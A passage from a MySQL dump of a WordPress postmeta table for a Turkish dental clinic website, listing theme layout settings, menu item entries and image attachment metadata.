  `meta_id` bigint(20) UNSIGNED NOT NULL,
  `post_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_520_ci
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

--
-- Tablo döküm verisi `zdenl_postmeta`
--

INSERT INTO `zdenl_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(78, 8, 'us_og_image', 'http://www.ze-dent.com/wp-content/uploads/2018/08/anasayfa.jpg'),
(79, 8, 'us_grid_layout_ids', '6416'),
(80, 8, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(81, 8, 'us_titlebar', 'hide'),
(82, 8, 'us_sidebar', ''),
(83, 8, 'us_sidebar_id', 'default_sidebar'),
(84, 8, 'us_header_sticky_pos', ''),
(85, 8, 'us_titlebar_subtitle', ''),
(86, 8, 'us_titlebar_size', ''),
(87, 8, 'us_titlebar_color', ''),
(88, 8, 'us_titlebar_image', ''),
(89, 8, 'us_titlebar_overlay_color', ''),
(90, 8, 'us_footer_id', 'site-footer'),
(91, 8, 'us_titlebar_bg_size', 'cover'),
(92, 8, 'us_titlebar_breadcrumbs', ''),
(93, 8, 'us_titlebar_bg_repeat', ''),
(94, 8, 'us_titlebar_bg_position', ''),
(95, 8, 'us_titlebar_bg_parallax', ''),
(96, 8, 'us_og_image', 'http://www.ze-dent.com/wp-content/uploads/2018/08/anasayfa.jpg'),
(97, 8, 'us_header', ''),
(98, 8, 'us_header_id', ''),
(99, 8, 'us_header_sticky_override', '0'),
(100, 8, 'us_header_transparent_override', '0'),
(101, 8, 'us_header_shadow', '0'),
(102, 8, 'us_sidebar_pos', 'right'),
(103, 8, 'us_footer', ''),
(104, 8, 'us_grid_layout_ids', '6416'),
(105, 9, 'us_og_image', ''),
(106, 9, 'us_grid_layout_ids', ''),
(107, 9, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(108, 9, 'us_titlebar', 'hide'),
(109, 9, 'us_sidebar', ''),
(110, 9, 'us_sidebar_id', 'default_sidebar'),
(111, 9, 'us_header_sticky_pos', ''),
(112, 9, 'us_titlebar_subtitle', ''),
(113, 9, 'us_titlebar_size', ''),
(114, 9, 'us_titlebar_color', ''),
(115, 9, 'us_titlebar_image', ''),
(116, 9, 'us_titlebar_overlay_color', ''),
(117, 9, 'us_footer_id', 'site-footer'),
(118, 9, 'us_titlebar_breadcrumbs', ''),
(119, 9, 'us_titlebar_bg_size', 'cover'),
(120, 9, 'us_titlebar_bg_repeat', ''),
(121, 9, 'us_titlebar_bg_position', ''),
(122, 9, 'us_titlebar_bg_parallax', ''),
(123, 9, 'us_og_image', ''),
(284, 5796, 'us_og_image', ''),
(285, 5796, 'us_grid_layout_ids', ''),
(286, 5796, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(287, 5796, '_menu_item_type', 'custom'),
(288, 5796, '_menu_item_menu_item_parent', '0'),
(289, 5796, '_menu_item_object_id', '5796'),
(290, 5796, '_menu_item_object', 'custom'),
(291, 5796, '_menu_item_target', ''),
(292, 5796, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(293, 5796, '_menu_item_xfn', ''),
(294, 5796, '_menu_item_url', '#intro'),
(295, 5797, 'us_og_image', ''),
(296, 5797, 'us_grid_layout_ids', ''),
(297, 5797, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(298, 5797, '_menu_item_type', 'custom'),
(299, 5797, '_menu_item_menu_item_parent', '0'),
(300, 5797, '_menu_item_object_id', '5797'),
(301, 5797, '_menu_item_object', 'custom'),
(302, 5797, '_menu_item_target', ''),
(303, 5797, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(304, 5797, '_menu_item_xfn', ''),
(305, 5797, '_menu_item_url', '#team'),
(306, 5798, 'us_og_image', ''),
(307, 5798, 'us_grid_layout_ids', ''),
(308, 5798, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(309, 5798, '_menu_item_type', 'custom'),
(310, 5798, '_menu_item_menu_item_parent', '0'),
(311, 5798, '_menu_item_object_id', '5798'),
(312, 5798, '_menu_item_object', 'custom'),
(313, 5798, '_menu_item_target', ''),
(314, 5798, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(315, 5798, '_menu_item_xfn', ''),
(316, 5798, '_menu_item_url', '#clients'),
(317, 5799, 'us_og_image', ''),
(318, 5799, 'us_grid_layout_ids', ''),
(319, 5799, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(320, 5799, '_menu_item_type', 'custom'),
(321, 5799, '_menu_item_menu_item_parent', '0'),
(322, 5799, '_menu_item_object_id', '5799'),
(323, 5799, '_menu_item_object', 'custom'),
(324, 5799, '_menu_item_target', ''),
(325, 5799, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(326, 5799, '_menu_item_xfn', ''),
(327, 5799, '_menu_item_url', '#history'),
(515, 1194, 'us_og_image', 'http://www.ze-dent.com/wp-content/uploads/2018/07/zeki-erdogan-9-350x350.jpg'),
(516, 1194, 'us_grid_layout_ids', ''),
(517, 1194, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(518, 1194, 'us_titlebar', ''),
(519, 1194, 'us_sidebar', ''),
(520, 1194, 'us_sidebar_id', 'default_sidebar'),
(521, 1194, 'us_header_sticky_pos', ''),
(522, 1194, 'us_titlebar_subtitle', 'We are a team of dedicated professionals,<br>ready to do what ever it takes to make your business grow.'),
(523, 1194, 'us_titlebar_size', ''),
(524, 1194, 'us_titlebar_color', ''),
(525, 1194, 'us_titlebar_image', ''),
(526, 1194, 'us_titlebar_overlay_color', ''),
(527, 1194, 'us_footer_id', 'site-footer'),
(528, 1194, 'us_titlebar_breadcrumbs', 'hide'),
(529, 1194, 'us_titlebar_bg_size', 'cover'),
(652, 2253, 'us_og_image', 'http://www.ze-dent.com/wp-content/uploads/2018/07/protez-tedavi.jpg'),
(653, 2253, 'us_grid_layout_ids', '6226'),
(654, 2253, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(655, 2253, 'us_titlebar', 'hide'),
(656, 2253, 'us_sidebar', ''),
(657, 2253, 'us_sidebar_id', 'default_sidebar'),
(658, 2253, 'us_header_sticky_pos', ''),
(659, 2253, 'us_titlebar_subtitle', ''),
(660, 2253, 'us_titlebar_size', ''),
(661, 2253, 'us_titlebar_color', ''),
(662, 2253, 'us_titlebar_image', ''),
(663, 2253, 'us_titlebar_overlay_color', ''),
(664, 2253, 'us_footer_id', 'site-footer'),
(665, 2253, 'us_titlebar_bg_size', 'cover'),
(666, 2253, 'us_og_image', 'http://www.ze-dent.com/wp-content/uploads/2018/07/protez-tedavi.jpg'),
(667, 2253, 'us_header', ''),
(668, 2253, 'us_header_id', ''),
(669, 2253, 'us_header_sticky_override', '0'),
(670, 2253, 'us_header_transparent_override', '0'),
(671, 2253, 'us_header_shadow', '1'),
(672, 2253, 'us_titlebar_breadcrumbs', ''),
(673, 2253, 'us_titlebar_bg_repeat', ''),
(674, 2253, 'us_titlebar_bg_position', ''),
(675, 2253, 'us_titlebar_bg_parallax', ''),
(676, 2253, 'us_sidebar_pos', 'right'),
(677, 2253, 'us_footer', ''),
(978, 3728, 'us_og_image', 'http://www.ze-dent.com/wp-content/uploads/2018/07/kanser-hastalari-agiz-ve-dis-sagligi-600x400.jpg'),
(979, 3728, 'us_grid_layout_ids', '6224'),
(980, 3728, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(981, 3728, 'us_titlebar_size', 'large'),
(982, 3728, 'us_titlebar', 'custom'),
(983, 3728, 'us_sidebar', ''),
(984, 3728, 'us_sidebar_id', 'default_sidebar'),
(985, 3728, 'us_header_sticky_pos', ''),
(986, 3728, 'us_titlebar_subtitle', ''),
(987, 3728, 'us_titlebar_color', ''),
(988, 3728, 'us_titlebar_image', ''),
(989, 3728, 'us_titlebar_overlay_color', ''),
(990, 3728, 'us_footer_id', 'site-footer'),
(991, 3728, 'us_titlebar_breadcrumbs', 'hide'),
(992, 3728, 'us_titlebar_bg_size', 'cover'),
(993, 3728, 'us_og_image', 'http://www.ze-dent.com/wp-content/uploads/2018/07/kanser-hastalari-agiz-ve-dis-sagligi-600x400.jpg'),
(994, 3728, 'us_titlebar_bg_repeat', ''),
(995, 3728, 'us_header_shadow', '0'),
(996, 3728, 'us_header_id', ''),
(997, 3728, 'us_header', ''),
(998, 3728, 'us_footer', ''),
(999, 3728, 'us_titlebar_bg_position', ''),
(1000, 3728, 'us_sidebar_pos', 'right'),
(1001, 3728, 'us_titlebar_bg_parallax', ''),
(1002, 3728, 'us_header_transparent_override', '0'),
(1003, 3728, 'us_header_sticky_override', '0'),
(1358, 5774, 'us_og_image', ''),
(1359, 5774, 'us_grid_layout_ids', ''),
(1360, 5774, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(1361, 5774, 'us_sidebar', ''),
(1362, 5774, 'us_sidebar_id', 'default_sidebar'),
(1363, 5774, 'us_header_sticky_pos', ''),
(1364, 5774, 'us_titlebar_subtitle', ''),
(1365, 5774, 'us_titlebar_size', ''),
(1366, 5774, 'us_titlebar_color', ''),
(1367, 5774, 'us_titlebar_image', ''),
(1368, 5774, 'us_titlebar_overlay_color', ''),
(1369, 5774, 'us_footer_id', 'site-footer'),
(1370, 5774, 'us_titlebar', 'hide'),
(1371, 5774, 'us_titlebar_bg_size', 'cover'),
(1372, 5774, 'us_footer', 'hide'),
(1373, 5774, 'us_og_image', ''),
(1624, 5467, 'us_og_image', ''),
(1625, 5467, 'us_grid_layout_ids', ''),
(1626, 5467, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(1627, 5467, 'us_og_image', ''),
(1628, 5467, 'us_grid_layout_ids', ''),
(1629, 5932, 'us_og_image', ''),
(1630, 5932, 'us_grid_layout_ids', ''),
(1631, 5932, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(1632, 5932, 'us_og_image', ''),
(1633, 5932, 'us_grid_layout_ids', ''),
(1943, 6124, 'us_og_image', ''),
(1944, 6124, 'us_grid_layout_ids', ''),
(1945, 6124, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(1946, 6124, '_menu_item_type', 'post_type'),
(1947, 6124, '_menu_item_menu_item_parent', '0'),
(1948, 6124, '_menu_item_object_id', '9'),
(1949, 6124, '_menu_item_object', 'page'),
(1950, 6124, '_menu_item_target', ''),
(1951, 6124, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(1952, 6124, '_menu_item_xfn', ''),
(1953, 6124, '_menu_item_url', ''),
(1954, 6125, 'us_og_image', ''),
(1955, 6125, 'us_grid_layout_ids', ''),
(1956, 6125, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(1957, 6125, '_menu_item_type', 'post_type'),
(1958, 6125, '_menu_item_menu_item_parent', '0'),
(1959, 6125, '_menu_item_object_id', '8'),
(1960, 6125, '_menu_item_object', 'page'),
(1961, 6125, '_menu_item_target', ''),
(1962, 6125, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(1963, 6125, '_menu_item_xfn', ''),
(1964, 6125, '_menu_item_url', ''),
(2086, 6137, 'us_og_image', ''),
(2087, 6137, 'us_grid_layout_ids', ''),
(2088, 6137, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(2089, 6137, '_menu_item_type', 'post_type'),
(2090, 6137, '_menu_item_menu_item_parent', '0'),
(2091, 6137, '_menu_item_object_id', '1194'),
(2092, 6137, '_menu_item_object', 'page'),
(2093, 6137, '_menu_item_target', ''),
(2094, 6137, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2095, 6137, '_menu_item_xfn', ''),
(2096, 6137, '_menu_item_url', ''),
(2097, 6138, 'us_og_image', ''),
(2098, 6138, 'us_grid_layout_ids', ''),
(2099, 6138, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(2100, 6138, '_menu_item_type', 'post_type'),
(2101, 6138, '_menu_item_menu_item_parent', '0'),
(2102, 6138, '_menu_item_object_id', '9'),
(2103, 6138, '_menu_item_object', 'page'),
(2104, 6138, '_menu_item_target', ''),
(2105, 6138, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2106, 6138, '_menu_item_xfn', ''),
(2107, 6138, '_menu_item_url', ''),
(2108, 6139, 'us_og_image', ''),
(2109, 6139, 'us_grid_layout_ids', ''),
(2110, 6139, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(2111, 6139, '_menu_item_type', 'post_type'),
(2112, 6139, '_menu_item_menu_item_parent', '0'),
(2113, 6139, '_menu_item_object_id', '8'),
(2114, 6139, '_menu_item_object', 'page'),
(2115, 6139, '_menu_item_target', ''),
(2116, 6139, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2117, 6139, '_menu_item_xfn', ''),
(2118, 6139, '_menu_item_url', ''),
(2295, 6156, 'us_og_image', ''),
(2296, 6156, 'us_grid_layout_ids', ''),
(2297, 6156, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(2298, 6156, '_menu_item_type', 'post_type'),
(2299, 6156, '_menu_item_menu_item_parent', '0'),
(2300, 6156, '_menu_item_object_id', '2253'),
(2301, 6156, '_menu_item_object', 'page'),
(2302, 6156, '_menu_item_target', ''),
(2303, 6156, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2304, 6156, '_menu_item_xfn', ''),
(2305, 6156, '_menu_item_url', ''),
(2647, 6188, 'us_og_image', ''),
(2648, 6188, 'us_grid_layout_ids', ''),
(2649, 6188, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(2650, 6188, '_menu_item_type', 'post_type'),
(2651, 6188, '_menu_item_menu_item_parent', '0'),
(2652, 6188, '_menu_item_object_id', '3728'),
(2653, 6188, '_menu_item_object', 'page'),
(2654, 6188, '_menu_item_target', ''),
(2655, 6188, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2656, 6188, '_menu_item_xfn', ''),
(2657, 6188, '_menu_item_url', ''),
(2761, 6208, '_wp_attached_file', '2018/07/favicon.png'),
(2762, 6208, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:19:\"2018/07/favicon.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"favicon-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2763, 6209, '_wp_attached_file', '2018/07/zedent_logo.png'),
(2764, 6209, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:344;s:6:\"height\";i:120;s:4:\"file\";s:23:\"2018/07/zedent_logo.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"zedent_logo-150x120.png\";s:5:\"width\";i:150;s:6:\"height\";i:120;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"zedent_logo-300x105.png\";s:5:\"width\";i:300;s:6:\"height\";i:105;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2769, 5932, '_edit_lock', '1543593328:1'),
(2770, 5932, 'slide_template', ''),
(2772, 9, '_edit_lock', '1531908489:1'),
(2773, 9, '_edit_last', '1'),
(2774, 9, '_wp_page_template', 'default'),
(2775, 9, 'slide_template', 'default'),
(2776, 9, '_wpb_vc_js_status', 'true'),
(2777, 9, 'us_header', ''),
(2778, 9, 'us_header_id', ''),
(2779, 9, 'us_header_sticky_override', '0'),
(2780, 9, 'us_header_transparent_override', '0'),
(2781, 9, 'us_header_shadow', '0'),
(2782, 9, 'us_sidebar_pos', 'right'),
(2783, 9, 'us_footer', ''),
(2787, 3728, '_edit_lock', '1531481095:1'),
(2788, 3728, '_edit_last', '1'),
(2789, 3728, '_wp_page_template', 'default'),
(2790, 3728, 'slide_template', 'default'),
(2791, 3728, '_wpb_vc_js_status', 'true'),
(2792, 6215, 'us_og_image', ''),
(2793, 6215, 'us_grid_layout_ids', ''),
(2794, 6215, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(2795, 6216, 'us_og_image', ''),
(2796, 6216, 'us_grid_layout_ids', ''),
(2797, 6216, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(2798, 2253, '_edit_lock', '1531495489:1'),
(2799, 2253, 'slide_template', 'default'),
(2800, 2253, '_wpb_vc_js_status', 'true'),
(2801, 2253, '_edit_last', '1'),
(2802, 2253, '_wp_page_template', 'default'),
(2803, 1194, '_edit_lock', '1581341678:1'),
(2808, 1194, 'slide_template', 'default'),
(2809, 1194, '_wpb_vc_js_status', 'true'),
(2810, 1194, '_edit_last', '1'),
(2811, 1194, '_wp_page_template', 'default'),
(2812, 1194, 'us_header', ''),
(2813, 1194, 'us_header_id', ''),
(2814, 1194, 'us_header_sticky_override', '0'),
(2815, 1194, 'us_header_transparent_override', '0'),
(2816, 1194, 'us_header_shadow', '0'),
(2817, 1194, 'us_titlebar_bg_repeat', ''),
(2818, 1194, 'us_titlebar_bg_position', ''),
(2819, 1194, 'us_titlebar_bg_parallax', ''),
(2820, 1194, 'us_sidebar_pos', 'right'),
(2821, 1194, 'us_footer', ''),
(2822, 6224, 'us_og_image', ''),
(2823, 6224, 'us_grid_layout_ids', ''),
(2824, 6224, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(2825, 6224, '_edit_lock', '1531410910:1'),
(2826, 6224, 'slide_template', ''),
(2827, 6226, 'us_og_image', ''),
(2828, 6226, 'us_grid_layout_ids', ''),
(2829, 6226, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(2830, 6226, '_edit_lock', '1531411076:1'),
(2831, 6226, 'slide_template', ''),
(2854, 6234, 'us_og_image', ''),
(2855, 6234, 'us_grid_layout_ids', ''),
(2856, 6234, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(2893, 6247, 'us_og_image', ''),
(2894, 6247, 'us_grid_layout_ids', ''),
(2895, 6247, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(2896, 6247, '_edit_last', '1'),
(2897, 6247, '_edit_lock', '1531475583:1'),
(2898, 6248, '_wp_attached_file', '2018/07/sks.jpg'),
(2899, 6248, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:534;s:4:\"file\";s:15:\"2018/07/sks.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"sks-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"sks-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:15:\"sks-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:15:\"sks-600x534.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:15:\"sks-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:15:\"sks-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2900, 6247, '_thumbnail_id', '6248'),
(2902, 6247, 'slide_template', 'default'),
(2903, 6247, '_wpb_vc_js_status', 'true'),
(2904, 6247, 'us_post_preview_layout', ''),
(2905, 6247, 'us_header', ''),
(2906, 6247, 'us_header_id', ''),
(2907, 6247, 'us_header_sticky_override', '0'),
(2908, 6247, 'us_header_transparent_override', '0'),
(2909, 6247, 'us_header_shadow', '0'),
(2910, 6247, 'us_header_sticky_pos', ''),
(2911, 6247, 'us_titlebar', ''),
(2912, 6247, 'us_titlebar_subtitle', ''),
(2913, 6247, 'us_titlebar_size', ''),
(2914, 6247, 'us_titlebar_color', ''),
(2915, 6247, 'us_titlebar_breadcrumbs', ''),
(2916, 6247, 'us_titlebar_image', ''),
(2917, 6247, 'us_titlebar_bg_size', ''),
(2918, 6247, 'us_titlebar_bg_repeat', ''),
(2919, 6247, 'us_titlebar_bg_position', ''),
(2920, 6247, 'us_titlebar_bg_parallax', ''),
(2921, 6247, 'us_titlebar_overlay_color', ''),
(2922, 6247, 'us_sidebar', ''),
(2923, 6247, 'us_sidebar_id', 'default_sidebar'),
(2924, 6247, 'us_sidebar_pos', 'right'),
(2925, 6247, 'us_footer', ''),
(2926, 6247, 'us_footer_id', 'default-footer'),
(2927, 6250, 'us_og_image', ''),
(2928, 6250, 'us_grid_layout_ids', ''),
(2929, 6250, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(2930, 6250, '_edit_last', '1'),
(2931, 6250, '_edit_lock', '1531935812:1'),
(2932, 6251, '_wp_attached_file', '2018/07/diseti-rahatsizliklari.jpg'),
(2933, 6251, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:534;s:4:\"file\";s:34:\"2018/07/diseti-rahatsizliklari.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"diseti-rahatsizliklari-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"diseti-rahatsizliklari-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:34:\"diseti-rahatsizliklari-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:34:\"diseti-rahatsizliklari-600x534.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:34:\"diseti-rahatsizliklari-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:34:\"diseti-rahatsizliklari-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2934, 6250, '_thumbnail_id', '6251'),
(2936, 6250, 'slide_template', 'default'),
(2937, 6250, '_wpb_vc_js_status', 'true'),
(2938, 6250, 'us_post_preview_layout', ''),
(2939, 6250, 'us_header', ''),
(2940, 6250, 'us_header_id', ''),
(2941, 6250, 'us_header_sticky_override', '0'),
(2942, 6250, 'us_header_transparent_override', '0'),
(2943, 6250, 'us_header_shadow', '0'),
(2944, 6250, 'us_header_sticky_pos', ''),
(2945, 6250, 'us_titlebar', ''),
(2946, 6250, 'us_titlebar_subtitle', ''),
(2947, 6250, 'us_titlebar_size', ''),
(2948, 6250, 'us_titlebar_color', ''),
(2949, 6250, 'us_titlebar_breadcrumbs', ''),
(2950, 6250, 'us_titlebar_image', ''),
(2951, 6250, 'us_titlebar_bg_size', ''),
(2952, 6250, 'us_titlebar_bg_repeat', ''),
(2953, 6250, 'us_titlebar_bg_position', ''),
(2954, 6250, 'us_titlebar_bg_parallax', ''),
(2955, 6250, 'us_titlebar_overlay_color', ''),
(2956, 6250, 'us_sidebar', ''),
(2957, 6250, 'us_sidebar_id', 'default_sidebar'),
(2958, 6250, 'us_sidebar_pos', 'right'),
(2959, 6250, 'us_footer', ''),
(2960, 6250, 'us_footer_id', 'site-footer'),
(2969, 6254, 'us_og_image', ''),
(2970, 6254, 'us_grid_layout_ids', ''),
(2971, 6254, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(2972, 6254, '_edit_last', '1'),
(2973, 6254, '_edit_lock', '1531935760:1'),
(2974, 6255, '_wp_attached_file', '2018/07/dolgu.jpg'),
(2975, 6255, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:534;s:4:\"file\";s:17:\"2018/07/dolgu.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"dolgu-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"dolgu-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:17:\"dolgu-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:17:\"dolgu-600x534.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:17:\"dolgu-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:17:\"dolgu-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2976, 6254, '_thumbnail_id', '6255'),
(2978, 6254, 'slide_template', 'default'),
(2979, 6254, '_wpb_vc_js_status', 'true'),
(2980, 6254, 'us_post_preview_layout', ''),
(2981, 6254, 'us_header', ''),
(2982, 6254, 'us_header_id', ''),
(2983, 6254, 'us_header_sticky_override', '0'),
(2984, 6254, 'us_header_transparent_override', '0'),
(2985, 6254, 'us_header_shadow', '0'),
(2986, 6254, 'us_header_sticky_pos', ''),
(2987, 6254, 'us_titlebar', ''),
(2988, 6254, 'us_titlebar_subtitle', ''),
(2989, 6254, 'us_titlebar_size', ''),
(2990, 6254, 'us_titlebar_color', ''),
(2991, 6254, 'us_titlebar_breadcrumbs', ''),
(2992, 6254, 'us_titlebar_image', ''),
